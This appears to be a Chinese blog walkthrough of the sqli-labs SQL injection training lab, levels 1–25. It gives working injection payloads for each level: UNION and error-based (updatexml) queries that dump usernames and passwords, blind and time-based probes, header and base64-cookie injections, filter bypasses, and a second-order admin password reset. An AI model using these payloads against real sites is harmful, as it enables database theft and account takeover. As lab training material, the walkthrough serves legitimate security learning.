sql注入练习之——sqli-labs 1-25

SQL注入攻击详解
最新推荐文章于 2024-08-06 01:03:14 发布
原创 最新推荐文章于 2024-08-06 01:03:14 发布 · 3.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入解析了25种不同类型的SQL注入攻击案例,包括常见的字符串注入、数值型注入、布尔注入及延迟注入等,详细展示了如何利用特定的SQL语法绕过网站的安全防护,实现数据脱库的过程。

第一关:
注入点:‘连接的字符串
在这里插入图片描述
数据脱库:
-1’ union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3-- -
在这里插入图片描述
第二关:
注入点:数值型
在这里插入图片描述
数据脱库:
-1 union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3–

在这里插入图片描述
第三关:
注入点:’)分割字符型
在这里插入图片描述
数据脱库:
?id=-1’) union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3–
在这里插入图片描述
第四关:
注入点:")分割字符型
在这里插入图片描述
数据脱库:
?id=-1") union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3–
在这里插入图片描述
第五关:
注入点:单引号为边界的字符串错误注入
在这里插入图片描述
数据脱库:
?id=1’ and updatexml(1,concat(0x7e,(select substring(group_concat(schema_name) ,1,20)from information_schema.schemata)),1)-- -
在这里插入图片描述
第六关:
注入点:双引号为边界的字符串错误注入
在这里插入图片描述
数据脱库:
在这里插入图片描述
第七关:
注入点:’))为边界的字符串布尔注入
在这里插入图片描述
查看数据库长度:
?id=1’)) and (length(database()))=8-- -
在这里插入图片描述
第八关:
注入点:单引号为边界的字符串布尔注入
在这里插入图片描述
查看数据库长度:
?id=1’ and (length(database()))=8-- -
在这里插入图片描述
第九关:
注入点:’延时注入
在这里插入图片描述
查看数据库长度:
?id=2’ and if(length(database())=8,sleep(5),0)-- -
在这里插入图片描述
第十关:
注入点:双引号延时注入
在这里插入图片描述
查看数据库长度:
?id=2" and if(length(database())=8,sleep(5),0)-- -
在这里插入图片描述
第十一关:
注入点:单引号为边界的字符串union注入
在这里插入图片描述
数据脱库:
在这里插入图片描述
第十二关:
注入点:”)为边界的字符串union注入
在这里插入图片描述
数据脱库:
在这里插入图片描述
第十三关:
注入点:’)边界的字符串报错注入
在这里插入图片描述
数据脱库:
在这里插入图片描述
第十四关:
注入点:”边界的字符串报错注入
在这里插入图片描述
数据脱库:
在这里插入图片描述

第十五关:
注入点:单引号布尔
查看数据库长度:
在这里插入图片描述
第十六关:
注入点:双引号括号布尔
查看数据库长度:
在这里插入图片描述
第十七关:
注入点:基于单引号报错
数据脱库:
在这里插入图片描述
第十八关:
注入点:单引号http头部User-Agent注入
数据脱库:
1’ and updatexml(1,concat(0x7e,(select substring(group_concat(concat_ws(0x7e,username,password)) ,1,20)from security.users)),1) and ‘1’=‘1
在这里插入图片描述
第十九关:
注入点:单引号http头部Referer注入
数据脱库:
在这里插入图片描述
第二十关:
注入点:单引号cookie
数据脱库:更改coolie后forward
Cookie: uname=admin’and updatexml(1,concat(0x7e,(select substring(group_concat(concat_ws(0x7e,username,password)) ,1,20)from security.users)),1)-- -
在这里插入图片描述
第二十一关:
注入点:’)cookie加base64解码
数据脱库:
YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBzdWJzdHJpbmcoZ3JvdXBfY29uY2F0KGNvbmNhdF93cygweDdlLHVzZXJuYW1lLHBhc3N3b3JkKSkgLDEsMjApZnJvbSBzZWN1cml0eS51c2VycykpLDEpLS0gLQ==
在这里插入图片描述
第二十二关:
注入点:”cookie加base64解码(题显示还是21,实际是22)
数据脱库:
YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHN1YnN0cmluZyhncm91cF9jb25jYXQoY29uY2F0X3dzKDB4N2UsdXNlcm5hbWUscGFzc3dvcmQpKSAsMSwyMClmcm9tIHNlY3VyaXR5LnVzZXJzKSksMSktLSAt
在这里插入图片描述
第二十三关:
注入点:’过滤#、–、+
数据脱库:将注释改为’
?id=-1’ union select 1,(select group_concat(concat_ws(0x7e,username,password))from security.users),3’
在这里插入图片描述
第二十四关:
注入点:二次注入
数据脱库:注册一个admin-- -用户,修改密码时直接修改了admin的密码
在这里插入图片描述
第二十五关:
注入点:单引号报错,屏蔽or and
数据脱库:关键字套关键字
?id=-1’ anandd updatexml(1,concat(0x7e,(select substring(group_concat(concat_ws(0x7e,username,passwoorrd)) ,1,20)from security.users)),1)-- -
在这里插入图片描述
第二十五a关:
注入点:数值 屏蔽or and #
数据脱库:延时或联合
?id=-1 union select 1,(select group_concat(concat_ws(0x7e,username,passwoorrd))from security.users),3-- -
在这里插入图片描述

sql注入---实战练习
fatsheep8_5的博客
03-22 915
ok,简简单单,出来了md5加密,那我们解密一下ok,破解成功后台shell拿下!试一下刚刚破解的能够登录成功,注入完成!!!仅仅是测试所用,此平台已经更换多个版本,求审稿大哥放我过申。
SQL注入--靶场练习
wmr123456001的博客
02-11 2339
SQL注入靶场练习
[SQL注入练习]K8-ASP渗透环境[K8team].rar
05-08
[SQL注入练习]K8-ASP渗透环境[K8team].rar
sql注入练习
最新发布
m0_64734557的博客
08-06 1131
打开文件在sql下面的db,可以查看账号、密码和名称有三种方式可以访问。1.通过域名访问(http://www.sqllabs.com)2.通过地址访问(127.0.0.1/qa)3.通过cx.cm软件进入如何通过软件进入先设置软件上面的各种配置安装没有的软件开启软件设置软件创建一个新的用户然后通过三种方法之一可以进入可以通过点击下面,直接进入。
精选资源
sqli-labs-php7-master.zip
04-06
SQL注入攻防演练平台——sqli-labs-php7-master》 在网络安全领域,CTF(Capture The Flag)比赛是一种常见的技术竞技形式,它旨在提升参赛者的网络安全技能,特别是对于Web安全的理解。在这个背景下,"sqli-labs...
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
二次注入——sqli-labs第24关
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-02 4663
首先,选择注册 盲猜有个admin的账号,所以注册一个admin '#的账号。密码是12345 (上帝视角)此时admin的密码是admin 登录 然后为admin '#修改密码为123 修改成功(此时真的是修改admin '#的密码吗) (又一次上帝视角)此时admin的密码成了123,而admin '#的密码并没有重置 这就是二次注入: 原理就是php把…………………… sql……………… 至于为什么会有 ...
sqli-labs-master.zip
03-17
SQL-labs是一个专为初学者设计的SQL注入练习靶场,帮助用户深入理解SQL注入的原理、手法以及防御策略。在这个靶场中,你可以通过实际操作,提升自己的Web安全技能和渗透测试能力。 SQL-labs靶场包含了丰富的练习...
SQL注入sqli-labs等(安装,配置)
weixin_46595570的博客
01-03 3900
简介 这次要使用的靶机环境是SQLi LabsSQLi-Labs是一个专业的SQL注入练习平台,它是只专注SQL注入漏洞,以便我们研究学习SQL注入的整个注入过程,适用于GET和POST场景,包含了以下注入: 类型 方式 基于错误的注入 字符和整数型 基于报错的注入 双查询注入注入 布尔型和时间型 更新查询注入 update 插入查询注入 insert Header头部注入 (基于Referer注入、基于UserAgent注入、..
sql注入练习工具
11-08
sql注入小工具 测试sql注入 安全类 仅供 学习参考使用
SQL注入练习
weixin_46502459的博客
07-27 153
ElasticSearch
Blanklr的博客
10-13 632
ElasticSearch 是非关系型数据库 官网: www.elastic.co,是基于Lucene的搜索服务器 关系型数据库查询的弊端 : 性能低、功能弱 ES是弥补这一缺点而诞生的 1.性能低 模糊查询 一条条的遍历 2.功能弱 存储的都是字符串 不能在商品信息字段中 查询出 含有华为或手机的 倒排索引 将各个文档中的内容进行分词、形成词条。然后记录词条和数据的唯一标识的对应关系,形成的产物。是一个散列图 存储原理 1.在index索引库中 生成数据表,即把所有的文档都进行分词
SQL注入练习--sqli-labs
qq_46263951的博客
02-12 3032
前言 SQL注入是比较常见的漏洞,有数据库的地方就可能存在SQL注入,所以学好SQL注入是非常有必要的,sqli-labs是一个不错的练习靶场。推荐一篇文章SQL注入之Mysql注入姿势及绕过总结 前置知识 注入流程 判断是否存在注入注入是字符型还是数字型,闭合情况,绕过方式 ?id=1' ?id=1" ?id=1') ?id=1") ?id=1' or 1# ?id=1' or 0# ?id=1' or 1=1# ?id=1' and 1=2# ?id=1' and sleep(5)# ?id=
SQLi-labsSQL注入练习
blalaa的博客
09-04 307
一、 Page-1(Basic Challenges) 【Less-1】 ①判断是否存在注入 输入参数,有输出 id=1’有报错,证明有注入点 ②猜解SQL查询语句中的字段数 Order by 3 正常: Order by 4 不正常: 所以字段数为3 ③确定显示的字段 2和3是显示位: ④获取当前数据库、版本 ⑤获取数据库中的表 ?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables wh
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值